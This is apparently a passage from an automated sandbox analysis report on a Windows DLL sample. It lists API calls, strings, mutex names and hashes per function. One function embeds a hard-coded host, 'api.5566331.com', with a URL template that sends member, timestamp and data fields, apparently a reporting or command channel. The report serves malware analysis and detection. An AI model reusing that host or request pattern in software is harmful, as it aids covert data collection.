                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: request: %s%s$Error (%s) in line: %d in file: %s$_requestBuffer.length() > 0$inc\http\HttpConnection.cpp$sendHeaders()
                                                      • API String ID: 2738768116-1894206355
                                                      • Opcode ID: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
                                                      • Instruction ID: 0e289029b42b07f0cd472e7fd920a7862120a76635c283eded3de750890f031e
                                                      • Opcode Fuzzy Hash: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
                                                      • Instruction Fuzzy Hash: BC01F530201254AAF330EA24AC1AEA736B5FF92601F44081FF5464F183D771EA8A8372
                                                      APIs
                                                      • _wprintf.LIBCMT ref: 1001A334
                                                      • send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
                                                      • WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B
                                                      Strings
                                                      • inc\http\Socket.cpp, xrefs: 1001A323
                                                      • Error (%s) in line: %d in file: %s, xrefs: 1001A32F
                                                      • data.length() > 0, xrefs: 1001A32A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wprintfsend
                                                      • String ID: Error (%s) in line: %d in file: %s$data.length() > 0$inc\http\Socket.cpp
                                                      • API String ID: 2875704336-3018366312
                                                      • Opcode ID: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
                                                      • Instruction ID: a370ff211135ef3551e3cbd0d85bcf54042522b8ec64c26ef99c261646a77a4d
                                                      • Opcode Fuzzy Hash: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
                                                      • Instruction Fuzzy Hash: 0EF0B432500620BBE720AA64DC04B86F7A4FB01671F004627FA249B691C370BE8587E1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintfgethostbynameinet_addr
                                                      • String ID: Error (%s) in line: %d in file: %s$address != NULL$inc\http\Socket.cpp
                                                      • API String ID: 2322658221-3467638553
                                                      • Opcode ID: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
                                                      • Instruction ID: 4b9a3f45cc822d481f5f270d039c0712fd041b9735d2b0daff9342695111d3cf
                                                      • Opcode Fuzzy Hash: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
                                                      • Instruction Fuzzy Hash: 08E092316109307BDB11EB2CAC44AC933D4EB06232F418143F404DB1A2D774EDC24AD5
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100117AF
                                                      • Sleep.KERNELBASE(00002710,?,?,00000000,000000FF,1005AF8C,00000000,10006588,?,00000000), ref: 10011861
                                                      • ReleaseMutex.KERNEL32 ref: 10011873
                                                      • CloseHandle.KERNELBASE ref: 10011881
                                                      • ReleaseMutex.KERNEL32 ref: 10011890
                                                      • CloseHandle.KERNEL32 ref: 10011898
                                                        • Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7
                                                        • Part of subcall function 100154F5: __EH_prolog.LIBCMT ref: 100154FA
                                                        • Part of subcall function 100154F5: _sprintf.LIBCMT ref: 10015565
                                                        • Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
                                                        • Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
                                                        • Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
                                                        • Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
                                                        • Part of subcall function 100154F5: CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseErrorH_prologHandleLastOpenRelease$CreateSleep_memmove_sprintf
                                                      • String ID:
                                                      • API String ID: 4039639769-0
                                                      • Opcode ID: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
                                                      • Instruction ID: 3068f5a1bf16b1bd64fdc3553b6d17508d20df758c6a95adc449cb463f1d6c97
                                                      • Opcode Fuzzy Hash: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
                                                      • Instruction Fuzzy Hash: 8F31C075900124AFEB14DF64CC96BED77B5EF44360F10826AF806AB1A2DF74AE85CB50
                                                      APIs
                                                        • Part of subcall function 10005BE6: WSAStartup.WS2_32(00000202,?), ref: 10005C19
                                                      • Sleep.KERNELBASE(0000000A), ref: 1001A92E
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 1001A94E
                                                      • CloseHandle.KERNEL32 ref: 1001A960
                                                      • ReleaseMutex.KERNEL32 ref: 1001A968
                                                      • CloseHandle.KERNEL32 ref: 1001A974
                                                      • Sleep.KERNELBASE(000001F4), ref: 1001A989
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleMutexReleaseSleep$Startup
                                                      • String ID:
                                                      • API String ID: 3889887703-0
                                                      • Opcode ID: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
                                                      • Instruction ID: 77a9dc64d7ec4658a88107c2dfb50ea3d3ee354ef9d95e056dd7178ddb840d27
                                                      • Opcode Fuzzy Hash: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
                                                      • Instruction Fuzzy Hash: 36F03CB1510230AFFB41DF75DC8D75A3BA2FB1935AF024215F085961B2C7F85980CB5A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: $Error (%s) in line: %d in file: %s$inc\http\HttpConnection.cpp$pDataOut != NULL
                                                      • API String ID: 2738768116-4064496196
                                                      • Opcode ID: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
                                                      • Instruction ID: b3279fd1f64e757fc39bef5126cbef0cf3ed16947356f535cad2a22282ac5a8b
                                                      • Opcode Fuzzy Hash: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
                                                      • Instruction Fuzzy Hash: 620108351006057AE331EA64CC41FD777B8EB20260F04095FF646961D3DB61FAC983A2
                                                      APIs
                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
                                                      • GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A
                                                      • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00100000,?,?,1001A9D0), ref: 1001B9AD
                                                      • CloseHandle.KERNEL32(?,?,1001A9D0), ref: 1001B9C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                      • String ID: Local\jkhgjfgs3gGwsef
                                                      • API String ID: 1661045500-2024575643
                                                      • Opcode ID: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
                                                      • Instruction ID: 510e1f7a28177a6c4adca6b9fa798e7cec5f3aa40cb69a399bd7e5cf68b8c7d0
                                                      • Opcode Fuzzy Hash: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
                                                      • Instruction Fuzzy Hash: ADF0A9B1100632BBE7208B329C9CE873F68EF8A7B4F114210FA09DA1A0C730C442DAB0
                                                      APIs
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F
                                                      • TerminateThread.KERNELBASE(00000260,00000000), ref: 100074FB
                                                      • CloseHandle.KERNEL32(00000260), ref: 10007507
                                                      • TerminateThread.KERNELBASE(0000025C,00000000), ref: 10007516
                                                      • CloseHandle.KERNEL32(0000025C), ref: 10007522
                                                      • CloseHandle.KERNEL32(00000230), ref: 1000752F
                                                        • Part of subcall function 1000BDB5: __EH_prolog.LIBCMT ref: 1000BDBA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$TerminateThread$Sleep$closesocket$H_prolog
                                                      • String ID:
                                                      • API String ID: 3433561863-0
                                                      • Opcode ID: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
                                                      • Instruction ID: 825a54de0ef117b15b095b619e3c21a0ce1a9e7865436b8144138b74cdb72a88
                                                      • Opcode Fuzzy Hash: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
                                                      • Instruction Fuzzy Hash: 72110A75200B508BE728DF35CC48AA6B7E5EF44385F01482DE19F97165DB78F945CB10
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10002371
                                                        • Part of subcall function 1001BC82: __EH_prolog.LIBCMT ref: 1001BC87
                                                        • Part of subcall function 1001BC82: LocalAlloc.KERNEL32(00000040,00000000,1005ADE8,1005AF8C,1005ADE8,00000000,10168660,00000000,00000000), ref: 1001BCE2
                                                        • Part of subcall function 1001BC82: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD03
                                                        • Part of subcall function 1001BC82: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD1A
                                                      • _sprintf.LIBCMT ref: 100023F4
                                                      Strings
                                                      • /index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s, xrefs: 100023EE
                                                      • api.5566331.com, xrefs: 10002430
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologLocal$AllocByteCharFreeMultiWide_sprintf
                                                      • String ID: /index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s$api.5566331.com
                                                      • API String ID: 1886346375-2983348053
                                                      • Opcode ID: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
                                                      • Instruction ID: ac0105269a1a7c84a4e52344445157f79487e8b33dc675cb9405ff6c2244ed2b
                                                      • Opcode Fuzzy Hash: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
                                                      • Instruction Fuzzy Hash: 89218175900148ABEB14DFA4CC55EDEB778EF14384F404469F406A7182EB70AE44CBE1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10017B2B
                                                        • Part of subcall function 10018235: __EH_prolog.LIBCMT ref: 1001823A
                                                        • Part of subcall function 10018235: std::locale::_Init.LIBCPMT ref: 100182C4
                                                        • Part of subcall function 10017D97: __EH_prolog.LIBCMT ref: 10017D9C
                                                        • Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
                                                        • Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4
                                                        • Part of subcall function 1001A313: _wprintf.LIBCMT ref: 1001A334
                                                        • Part of subcall function 1001A313: send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
                                                        • Part of subcall function 1001A313: WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B
                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 10017BC6
                                                        • Part of subcall function 1003293B: std::ios_base::_Tidy.LIBCPMT ref: 1003295B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$_wprintfstd::ios_base::_$ErrorInitIos_base_dtorLastTidysendstd::locale::_
                                                      • String ID: Content-Length$inc\http\HttpConnection.cpp
                                                      • API String ID: 918007117-3146130545
                                                      • Opcode ID: 24fab065c903b3dd983afc7dceb8c9ef11f553ad663bb2b64f721690f0fc7afb
                                                      • Instruction ID: 75a4cd840f36df8d2ac12fee9985095fe0ae56a02b47657bfe69f213c4d39a4c
                                                      • Opcode Fuzzy Hash: 24fab065c903b3dd983afc7dceb8c9ef11f553ad663bb2b64f721690f0fc7afb
                                                      • Instruction Fuzzy Hash: A8110636900204ABD715E768CD13BEEB7B8EF41350F10015EF105AB192DB306F88C792
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001A1E6
                                                      • recv.WS2_32(?,?,00400000,00000000), ref: 1001A215
                                                      • WSAGetLastError.WS2_32 ref: 1001A21F
                                                      • recv.WS2_32(?,?,00400000,00000000), ref: 1001A2F7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv$ErrorH_prologLast
                                                      • String ID:
                                                      • API String ID: 1189367603-0
                                                      • Opcode ID: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
                                                      • Instruction ID: b4c2601fb093304271381bf4d6a57f627c918c8f1ebe356989ccf57b4cacec91
                                                      • Opcode Fuzzy Hash: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
                                                      • Instruction Fuzzy Hash: 22314871900659EFDB10CBE8CC81BEEBBF8FF19354F10452AE416A7191DB74AA45CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001C131
                                                      • __mbsinc.LIBCMT ref: 1001C177
                                                      • PathIsDirectoryA.SHLWAPI(?), ref: 1001C1B5
                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,1000E095,?,1005C6FC,?,?,?), ref: 1001C1D0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Directory$CreateH_prologPath__mbsinc
                                                      • String ID:
                                                      • API String ID: 3676323035-0
                                                      • Opcode ID: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
                                                      • Instruction ID: 39af0d0c7e0004fa6f05bf9c636e80e62591e6cbe11adbc1e24eaa1d211b549f
                                                      • Opcode Fuzzy Hash: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
                                                      • Instruction Fuzzy Hash: 2F310836940549BFEB11CB68C890FDEBBA8EF42394F154169E4456B1C2DF70EE88CB90
                                                      APIs
                                                        • Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
                                                        • Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5
                                                      • _malloc.LIBCMT ref: 1000DAD5
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _malloc.LIBCMT ref: 1000DAEF
                                                      • _malloc.LIBCMT ref: 1000DB04
                                                      • _malloc.LIBCMT ref: 1000DB1D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _malloc$AllocateCreateGuidHeap_fprintf
                                                      • String ID:
                                                      • API String ID: 995246934-0
